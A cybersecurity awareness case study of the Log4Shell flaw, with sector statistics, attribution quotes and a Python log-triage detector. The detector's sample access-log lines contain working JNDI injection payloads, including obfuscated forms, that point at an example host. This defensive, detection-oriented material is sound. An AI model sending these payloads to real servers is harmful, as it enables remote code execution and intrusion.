Cyber-Attack Case Study: The Log4Shell Vulnerability

Cyber-Attack - Log4j Vulnerability

Log4j is a widely used Java logging library: applications rely on it to record errors and routine events and to relay diagnostics to system administrators. In December 2021 a critical flaw in it, dubbed ‘Log4Shell’ (CVE-2021-44228), was reported to have put 72% of organisations worldwide at risk, making it one of the most dangerous vulnerabilities of recent years.
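Log4Shell works because vulnerable Log4j 2 versions resolve `${...}` lookups inside the strings they log, so a payload such as `${jndi:ldap://attacker/a}` placed in any field that ends up in a log line (a User-Agent header, a username, a form field) makes the server contact an attacker-controlled host and load code from it. The following detector is an added example for this page, not code from the original article or from the Log4j project. It assumes web-server access logs where the payload lands in the User-Agent field; the log lines and the 198.51.100.7 address are constructed for the example. It collapses the common tricks attackers use to hide the literal `jndi` token (`${lower:j}`, `${::-j}`, `${env:X:-j}`) before matching, so it is useful for triage of existing logs, but it is not a substitute for upgrading to a fixed Log4j release.

```python
import re

# Constructed sample access-log lines (not from the original page): two benign
# requests, a plain Log4Shell probe and two obfuscated variants of the same lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:07 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET /login HTTP/1.1" 200 128 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET /login HTTP/1.1" 200 128 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.5 - - [10/Dec/2021:13:01:15 +0000] "GET /price?amount=${total} HTTP/1.1" 200 64 "-" "curl/7.68.0"',
]

# Innermost Log4j lookups that attackers use purely to disguise the "jndi" token.
# Each pattern only matches a lookup with no nested "${" inside its braces, so
# repeated substitution resolves nesting from the inside out.
#   ${lower:j} / ${upper:J}      -> the single character, case-folded later
#   ${::-j}                      -> empty lookup whose default value is "j"
#   ${env:NOPE:-j} / ${sys:x:-j} -> lookup of a missing variable, default "j"
_INNER_LOOKUPS = [
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I), lambda m: m.group(1)),
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), lambda m: m.group(1)),
]

# After normalisation the real lookup is recognisable: ${jndi:<scheme>://...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://")


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested obfuscation lookups and lower-case the result.

    This is a regex approximation of how Log4j 2 expands lookups, limited to the
    forms listed above; it is an assumption for this example, not the library's
    own resolver, so exotic lookup types are left untouched.
    """
    for _ in range(max_rounds):
        new = text
        for pattern, repl in _INNER_LOOKUPS:
            new = pattern.sub(repl, new)
        if new == text:
            break
        text = new
    return text.lower()


def detect_log4shell(line: str):
    """Return (scheme, normalised_payload) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    payload = norm[m.start():] if end == -1 else norm[m.start():end + 1]
    return m.group(1), payload


def scan(lines):
    """Return [(line_number, scheme, payload), ...] for every line that looks like an attempt."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = detect_log4shell(line)
        if hit:
            hits.append((number, *hit))
    return hits


if __name__ == "__main__":
    for number, scheme, payload in scan(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup via {scheme}: {payload}")
```

The benign `${total}` on the last sample line is deliberately left alone: it is a lookup-shaped string with no `jndi:` prefix, and flagging every `${` would bury real hits in noise. A hit on the `rmi` or `ldap` scheme pointing at an external host should be treated as an exploitation attempt against that server and checked against the host's Log4j version.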

In 2021, 93% of cloud environments were at risk from the flaw. Successful exploitation lets an attacker run code of their choosing on the affected server and from there gain access to the organisation’s IT systems, whether the host sits on the internet, is reached remotely or runs as a virtual machine. Patching across companies and businesses worldwide took around 10 days. Wiz, a cloud security provider, calculated the share of organisations in each sector that remained vulnerable to Log4Shell afterwards:

  • Financial services at 50%

  • Healthcare services at 46%

  • Software at 46%

  • Media and entertainment industries at 43%

  • Retail at 41%

  • Manufacturing at 34%


One documented use of the exploit was espionage by an Iranian state-linked actor against organisations in Israel. “The espionage-motivated threat actor Boggy Serpens (also known as MuddyWater, MERCURY/Mango Sandstorm) was attributed by CISA (Cybersecurity & Infrastructure Security Agency) to the MOIS (Ministry of Intelligence and Security) of the Iranian state. Microsoft detected this group exploiting this vulnerability when attacking organizations in Israel in July 2022,” stated Alex Hinchliffe, Threat Intelligence Analyst.


Two years after the vulnerability was discovered and patched, threat actors were still finding new ways to exploit Log4j in 2023. Amit Shah, Director of Product Marketing, described a newer campaign dubbed ‘proxyjacking’ in an interview:

“Some companies are still vulnerable to Log4Shell because they have not yet been able to find and patch all instances of Log4j. For example, a new attack campaign involving ‘proxyjacking’ was recently discovered. This involves attackers trying to install proxyware and then selling the victims’ Internet bandwidth. While this is a nuisance rather than a serious threat, it can still cost victims dearly when a cloud provider charges fees based on measured data traffic. In addition, a victim’s Internet bandwidth could be used for a cyber attack.”


Your Security is our Priority

Your friendly Support Team


Speak to us about all your computer needs

This is part of our Cyber Security awareness educational campaign. Through this training, you will learn the key principles and best practices for protecting yourself, your organisation and the public from cyber attackers. You will also be equipped with the knowledge to identify potential threats and act before any damage occurs.
